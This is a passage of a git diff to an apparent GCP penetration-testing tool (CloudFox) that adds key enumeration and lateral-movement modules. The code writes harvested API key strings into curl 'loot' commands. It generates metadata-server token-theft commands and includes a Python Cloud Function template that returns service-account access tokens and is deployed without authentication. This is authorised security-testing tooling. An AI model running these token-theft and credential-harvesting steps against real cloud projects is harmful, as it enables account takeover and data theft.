parts[len(parts)-1] - } + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + body = append(body, row) } - encryption := instance.BootDiskEncryption - if encryption == "" { - encryption = "Google" - } - securityConfigBody = append(securityConfigBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - instanceBoolToCheck(instance.ShieldedVM), - instanceBoolToCheck(instance.SecureBoot), - instanceBoolToCheck(instance.VTPMEnabled), - instanceBoolToCheck(instance.IntegrityMonitoring), - instanceBoolToCheck(instance.ConfidentialVM), - encryption, - kmsKey, - }) } - // SSH keys table (pentest-focused) + // SSH keys table (pentest-focused - keep separate) sshKeysHeader := []string{ - "Source", "Project Name", "Project ID", + "Source", "Zone", "Username", "Key Type", @@ -915,9 +505,9 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge for _, key := range meta.ProjectSSHKeys { parts := parseSSHKeyLine(key) sshKeysBody = append(sshKeysBody, []string{ - "PROJECT", m.GetProjectName(projectID), projectID, + "PROJECT", "-", parts.Username, parts.KeyType, @@ -933,9 +523,9 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge for _, key := range instance.SSHKeys { parts := parseSSHKeyLine(key) sshKeysBody = append(sshKeysBody, []string{ - instance.Name, m.GetProjectName(instance.ProjectID), instance.ProjectID, + instance.Name, instance.Zone, parts.Username, parts.KeyType, @@ -945,10 +535,10 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } } - // Collect loot files + // Collect loot files (only if content was added beyond header) var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -962,33 +552,6 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge }, } - // Add service accounts table if there are any - if len(saBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-service-accounts", - Header: saHeader, - Body: saBody, - }) - } - - // Add findings table if there are any - if len(findingsBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-findings", - Header: findingsHeader, - Body: findingsBody, - }) - } - - // Add startup scripts table if there are any - if len(startupBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-startup-scripts", - Header: startupHeader, - Body: startupBody, - }) - } - // Add SSH keys table if there are any if len(sshKeysBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ @@ -998,13 +561,6 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge }) } - // Always add security config table - tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-security-config", - Header: securityConfigHeader, - Body: securityConfigBody, - }) - output := InstancesOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go new file mode 100644 index 00000000..4ae10519 --- /dev/null +++ b/gcp/commands/keys.go @@ -0,0 +1,415 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKeysCommand = &cobra.Command{ + Use: globals.GCP_KEYS_MODULE_NAME, + Aliases: []string{"credentials", "creds", "access-keys"}, + Short: "Enumerate all GCP keys (SA keys, HMAC keys, API keys)", + Long: `Enumerate all types of GCP keys and credentials. + +Key Types: +- SA Keys: Service account RSA keys for OAuth 2.0 authentication +- HMAC Keys: S3-compatible access keys for Cloud Storage +- API Keys: Project-level keys for API access (Maps, Translation, etc.) + +Features: +- Unified view of all credential types +- Shows key age and expiration status +- Identifies Google-managed vs user-managed keys +- Generates exploitation commands for penetration testing`, + Run: runGCPKeysCommand, +} + +// UnifiedKeyInfo represents a key from any source +type UnifiedKeyInfo struct { + ProjectID string + KeyType string // "SA Key", "HMAC", "API Key" + KeyID string + Owner string // Email for SA/HMAC, "Project-level" for API keys + DisplayName string + Origin string // "Google Managed", "User Managed", "Service Account", "User", "-" + Algorithm string // Key algorithm (e.g., "KEY_ALG_RSA_2048") + State string // "ACTIVE", "INACTIVE", "DELETED", "DISABLED" + CreateTime time.Time + ExpireTime time.Time + Expired bool + DWDEnabled bool // For SA keys - whether the SA has Domain-Wide Delegation enabled + Restrictions string // For API keys only + KeyString string // For API keys only (if accessible) +} + +type KeysModule struct { + gcpinternal.BaseGCPModule + Keys []UnifiedKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type KeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KEYS_MODULE_NAME) + if err != nil { + return + } + + module := &KeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Keys: []UnifiedKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) + + if len(m.Keys) == 0 { + logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) + return + } + + // Count by type + saKeyCount := 0 + hmacKeyCount := 0 + apiKeyCount := 0 + userManagedCount := 0 + + for _, key := range m.Keys { + switch key.KeyType { + case "SA Key": + saKeyCount++ + if key.Origin == "User Managed" { + userManagedCount++ + } + case "HMAC": + hmacKeyCount++ + case "API Key": + apiKeyCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", + len(m.Keys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) + } + + var projectKeys []UnifiedKeyInfo + + // 1. Enumerate Service Account Keys + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + } else { + for _, sa := range serviceAccounts { + // Check if DWD is enabled (OAuth2ClientID is set) + dwdEnabled := sa.OAuth2ClientID != "" + + for _, key := range sa.Keys { + // Extract key ID from full name + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + + origin := "Google Managed" + if key.KeyType == "USER_MANAGED" { + origin = "User Managed" + } + + state := "ACTIVE" + if key.Disabled { + state = "DISABLED" + } + + expired := false + if !key.ValidBefore.IsZero() && time.Now().After(key.ValidBefore) { + expired = true + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "SA Key", + KeyID: keyID, + Owner: sa.Email, + DisplayName: sa.DisplayName, + Origin: origin, + Algorithm: key.KeyAlgorithm, + State: state, + CreateTime: key.ValidAfter, + ExpireTime: key.ValidBefore, + Expired: expired, + DWDEnabled: dwdEnabled, + }) + } + } + } + + // 2. Enumerate HMAC Keys + hmacService := hmacservice.New() + hmacKeys, err := hmacService.ListHMACKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) + } else { + for _, key := range hmacKeys { + origin := "Service Account" + // Note: User HMAC keys are not enumerable via API, so all we see are SA keys + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "HMAC", + KeyID: key.AccessID, + Owner: key.ServiceAccountEmail, + DisplayName: "", + Origin: origin, + State: key.State, + CreateTime: key.TimeCreated, + Expired: false, // HMAC keys don't expire + }) + } + } + + // 3. Enumerate API Keys + apiKeysService := apikeysservice.New() + apiKeys, err := apiKeysService.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) + } else { + for _, key := range apiKeys { + // Extract key ID from full name + keyID := key.UID + if keyID == "" { + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + } + + state := "ACTIVE" + if !key.DeleteTime.IsZero() { + state = "DELETED" + } + + restrictions := "None" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions = fmt.Sprintf("%s (APIs: %d)", key.RestrictionType, len(key.AllowedAPIs)) + } + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "API Key", + KeyID: keyID, + Owner: "Project-level", + DisplayName: key.DisplayName, + Origin: "-", + State: state, + CreateTime: key.CreateTime, + Expired: false, // API keys don't expire + Restrictions: restrictions, + KeyString: key.KeyString, + }) + } + } + + // Thread-safe append + m.mu.Lock() + m.Keys = append(m.Keys, projectKeys...) + for _, key := range projectKeys { + m.addKeyToLoot(key) + } + m.mu.Unlock() +} + +func (m *KeysModule) initializeLootFiles() { + m.LootMap["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *KeysModule) addKeyToLoot(key UnifiedKeyInfo) { + switch key.KeyType { + case "HMAC": + if key.State == "ACTIVE" { + m.LootMap["keys-hmac-s3-commands"].Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } + + case "API Key": + if key.KeyString != "" { + m.LootMap["keys-apikey-test-commands"].Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } + } +} + +func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Key Type", + "Key ID", + "Owner", + "Origin", + "Algorithm", + "State", + "Created", + "Expires", + "DWD", + "Restrictions", + } + + var body [][]string + for _, key := range m.Keys { + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + + expires := "-" + if !key.ExpireTime.IsZero() { + // Check for "never expires" (year 9999) + if key.ExpireTime.Year() >= 9999 { + expires = "Never" + } else { + expires = key.ExpireTime.Format("2006-01-02") + } + } + + dwd := "-" + if key.KeyType == "SA Key" { + if key.DWDEnabled { + dwd = "Yes" + } else { + dwd = "No" + } + } + + restrictions := "-" + if key.KeyType == "API Key" { + restrictions = key.Restrictions + } + + algorithm := key.Algorithm + if algorithm == "" { + algorithm = "-" + } + + body = append(body, []string{ + key.ProjectID, + m.GetProjectName(key.ProjectID), + key.KeyType, + key.KeyID, + key.Owner, + key.Origin, + algorithm, + key.State, + created, + expires, + dwd, + restrictions, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "keys", + Header: header, + Body: body, + }, + } + + output := KeysOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index af2aea7b..3590f14c 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -15,7 +15,7 @@ import ( var GCPKMSCommand = &cobra.Command{ Use: globals.GCP_KMS_MODULE_NAME, - Aliases: []string{"keys", "crypto"}, + Aliases: []string{"crypto", "encryption-keys"}, Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. @@ -170,116 +170,73 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger // Loot File Management // ------------------------------ func (m *KMSModule) initializeLootFiles() { - m.LootMap["kms-gcloud-commands"] = &internal.LootFile{ - Name: "kms-gcloud-commands", - Contents: "# KMS gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["kms-public-access"] = &internal.LootFile{ - Name: "kms-public-access", - Contents: "# PUBLIC KMS Key Access\n# Generated by CloudFox\n# These keys have public encrypt/decrypt access!\n\n", - } - m.LootMap["kms-exploitation"] = &internal.LootFile{ - Name: "kms-exploitation", - Contents: "# KMS Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["kms-no-rotation"] = &internal.LootFile{ - Name: "kms-no-rotation", - Contents: "# KMS Keys Without Rotation\n# Generated by CloudFox\n# These encryption keys have no rotation configured\n\n", + m.LootMap["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { - keyPath := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s/cryptoKeys/%s", - key.ProjectID, key.Location, key.KeyRing, key.Name) + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "## Key: %s (Project: %s, KeyRing: %s, Location: %s)\n"+ + "# Purpose: %s, Protection: %s\n", + key.Name, key.ProjectID, + key.KeyRing, key.Location, + key.Purpose, key.ProtectionLevel, + ) - // gcloud commands - m.LootMap["kms-gcloud-commands"].Contents += fmt.Sprintf( - "# Key: %s (Project: %s, KeyRing: %s)\n"+ + // Commands + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "\n# Describe key:\n"+ "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "# Get IAM policy:\n"+ "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ - "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n\n", - key.Name, key.ProjectID, key.KeyRing, + "# List versions:\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n", key.Name, key.KeyRing, key.Location, key.ProjectID, key.Name, key.KeyRing, key.Location, key.ProjectID, key.Name, key.KeyRing, key.Location, key.ProjectID, ) - // Public access - if key.IsPublicEncrypt || key.IsPublicDecrypt { - m.LootMap["kms-public-access"].Contents += fmt.Sprintf( - "# KEY: %s\n"+ - "# Project: %s, Location: %s, KeyRing: %s\n"+ - "# Purpose: %s, Protection: %s\n"+ - "# Public Encrypt: %v\n"+ - "# Public Decrypt: %v\n\n", - key.Name, - key.ProjectID, key.Location, key.KeyRing, - key.Purpose, key.ProtectionLevel, - key.IsPublicEncrypt, - key.IsPublicDecrypt, - ) - } - - // Keys without rotation (only for symmetric encryption keys) - if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { - m.LootMap["kms-no-rotation"].Contents += fmt.Sprintf( - "# KEY: %s\n"+ - "# Project: %s, Location: %s, KeyRing: %s\n"+ - "# Purpose: %s, Protection: %s\n"+ - "# Created: %s\n\n", - key.Name, - key.ProjectID, key.Location, key.KeyRing, - key.Purpose, key.ProtectionLevel, - key.CreateTime, - ) - } - - // Exploitation commands - m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( - "# Key: %s (Project: %s)\n"+ - "# Purpose: %s, Protection: %s\n"+ - "# Path: %s\n\n", - key.Name, key.ProjectID, - key.Purpose, key.ProtectionLevel, - keyPath, - ) - + // Purpose-specific commands switch key.Purpose { case "ENCRYPT_DECRYPT": - m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( - "# Encrypt data (if you have cloudkms.cryptoKeyVersions.useToEncrypt):\n"+ - "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n\n"+ - "# Decrypt data (if you have cloudkms.cryptoKeyVersions.useToDecrypt):\n"+ - "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n\n", + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Encrypt data:\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n"+ + "# Decrypt data:\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n", key.Name, key.KeyRing, key.Location, key.ProjectID, key.Name, key.KeyRing, key.Location, key.ProjectID, ) case "ASYMMETRIC_SIGN": - m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( - "# Sign data (if you have cloudkms.cryptoKeyVersions.useToSign):\n"+ - "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n\n"+ + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Sign data:\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ "# Get public key:\n"+ - "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n\n", + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", key.Name, key.KeyRing, key.Location, key.ProjectID, key.Name, key.KeyRing, key.Location, key.ProjectID, ) case "ASYMMETRIC_DECRYPT": - m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( - "# Decrypt data (if you have cloudkms.cryptoKeyVersions.useToDecrypt):\n"+ - "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n\n"+ + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Decrypt data:\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ "# Get public key:\n"+ - "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n\n", + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", key.Name, key.KeyRing, key.Location, key.ProjectID, key.Name, key.KeyRing, key.Location, key.ProjectID, ) } + + m.LootMap["kms-commands"].Contents += "\n" } // ------------------------------ // Output Generation // ------------------------------ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Crypto keys table + // Crypto keys table with IAM columns - one row per IAM binding keysHeader := []string{ "Project Name", "Project ID", @@ -291,7 +248,10 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { "Version", "State", "Rotation", + "Public Encrypt", "Public Decrypt", + "IAM Role", + "IAM Member", } var keysBody [][]string @@ -302,19 +262,14 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { rotation = formatDuration(key.RotationPeriod) } - // Format public decrypt - publicDecrypt := "No" - if key.IsPublicDecrypt { - publicDecrypt = "YES!" - } - // Format protection level protection := key.ProtectionLevel if protection == "" { protection = "SOFTWARE" } - keysBody = append(keysBody, []string{ + // Base row data (reused for each IAM binding) + baseRow := []string{ m.GetProjectName(key.ProjectID), key.ProjectID, key.Name, @@ -325,8 +280,27 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { key.PrimaryVersion, key.PrimaryState, rotation, - publicDecrypt, - }) + boolToYesNo(key.IsPublicEncrypt), + boolToYesNo(key.IsPublicDecrypt), + } + + // If key has IAM bindings, create one row per binding + if len(key.IAMBindings) > 0 { + for _, binding := range key.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + keysBody = append(keysBody, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + keysBody = append(keysBody, row) + } } // Key rings table (summary) @@ -352,7 +326,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 77a6500b..2484a3a4 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -6,6 +6,10 @@ import ( "strings" "sync" + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -59,24 +63,6 @@ type TokenTheftVector struct { ExploitCommand string } -type CrossProjectPath struct { - SourceProject string - TargetProject string - Principal string - Role string - AccessType string // "direct", "impersonation", "shared_vpc" - RiskLevel string -} - -type CredentialLocation struct { - ResourceType string - ResourceName string - ProjectID string - CredentialType string // "sa_key", "api_key", "secret", "env_var" - Description string - RiskLevel string -} - // ------------------------------ // Module Struct // ------------------------------ @@ -85,8 +71,6 @@ type LateralMovementModule struct { ImpersonationChains []ImpersonationChain TokenTheftVectors []TokenTheftVector - CrossProjectPaths []CrossProjectPath - CredentialLocations []CredentialLocation LootMap map[string]*internal.LootFile mu sync.Mutex } @@ -115,8 +99,6 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ImpersonationChains: []ImpersonationChain{}, TokenTheftVectors: []TokenTheftVector{}, - CrossProjectPaths: []CrossProjectPath{}, - CredentialLocations: []CredentialLocation{}, LootMap: make(map[string]*internal.LootFile), } @@ -134,14 +116,14 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) // Check results - totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) + len(m.CrossProjectPaths) + totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) if totalPaths == 0 { logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors, %d cross-project paths", - totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors), len(m.CrossProjectPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors", + totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -159,12 +141,6 @@ func (m *LateralMovementModule) processProject(ctx context.Context, projectID st // 2. Find token theft vectors (compute instances, functions, etc.) m.findTokenTheftVectors(ctx, projectID, logger) - - // 3. Find cross-project access - m.findCrossProjectAccess(ctx, projectID, logger) - - // 4. Find credential storage locations - m.findCredentialLocations(ctx, projectID, logger) } // findImpersonationChains finds service account impersonation paths @@ -239,307 +215,459 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro // findTokenTheftVectors finds compute resources where tokens can be stolen func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { - // This would use Compute Engine API to find instances with service accounts - // For now, we'll add the pattern for common token theft vectors - - // Common token theft vectors in GCP: - vectors := []TokenTheftVector{ - { - ResourceType: "compute_instance", - ResourceName: "*", - ProjectID: projectID, - ServiceAccount: "", - AttackVector: "metadata_server", - RiskLevel: "HIGH", - ExploitCommand: `curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, - }, - { + // Find Compute Engine instances with service accounts + m.findComputeInstanceVectors(ctx, projectID, logger) + + // Find Cloud Functions with service accounts + m.findCloudFunctionVectors(ctx, projectID, logger) + + // Find Cloud Run services with service accounts + m.findCloudRunVectors(ctx, projectID, logger) + + // Find GKE clusters with node service accounts + m.findGKEVectors(ctx, projectID, logger) +} + +// findComputeInstanceVectors finds compute instances where tokens can be stolen via metadata server +func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, projectID string, logger internal.Logger) { + computeService := ComputeEngineService.New() + + instances, err := computeService.Instances(projectID) + if err != nil { + // Don't count as error - API may not be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get compute instances in project %s", projectID)) + } + return + } + + for _, instance := range instances { + // Skip instances without service accounts + if len(instance.ServiceAccounts) == 0 { + continue + } + + for _, sa := range instance.ServiceAccounts { + // Skip default compute SA if it has no useful scopes + if sa.Email == "" { + continue + } + + vector := TokenTheftVector{ + ResourceType: "compute_instance", + ResourceName: instance.Name, + ProjectID: projectID, + ServiceAccount: sa.Email, + AttackVector: "metadata_server", + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token +gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, + instance.Name, instance.Zone, projectID), + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } + } +} + +// findCloudFunctionVectors finds Cloud Functions where tokens can be stolen +func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, projectID string, logger internal.Logger) { + functionsService := FunctionsService.New() + + functions, err := functionsService.Functions(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Functions in project %s", projectID)) + } + return + } + + for _, fn := range functions { + if fn.ServiceAccount == "" { + continue + } + + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Function %s +# Service Account: %s +# Region: %s + +# Step 1: Create token exfiltration function code +mkdir -p /tmp/token-theft-%s && cd /tmp/token-theft-%s + +cat > main.py << 'PYEOF' +import functions_framework +import requests + +@functions_framework.http +def steal_token(request): + # Fetch SA token from metadata server + token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return { + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + } +PYEOF + +cat > requirements.txt << 'REQEOF' +functions-framework==3.* +requests==2.* +REQEOF + +# Step 2: Deploy function with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs) +gcloud functions deploy token-theft-poc \ + --gen2 \ + --runtime=python311 \ + --region=%s \ + --source=. \ + --entry-point=steal_token \ + --trigger-http \ + --allow-unauthenticated \ + --service-account=%s \ + --project=%s + 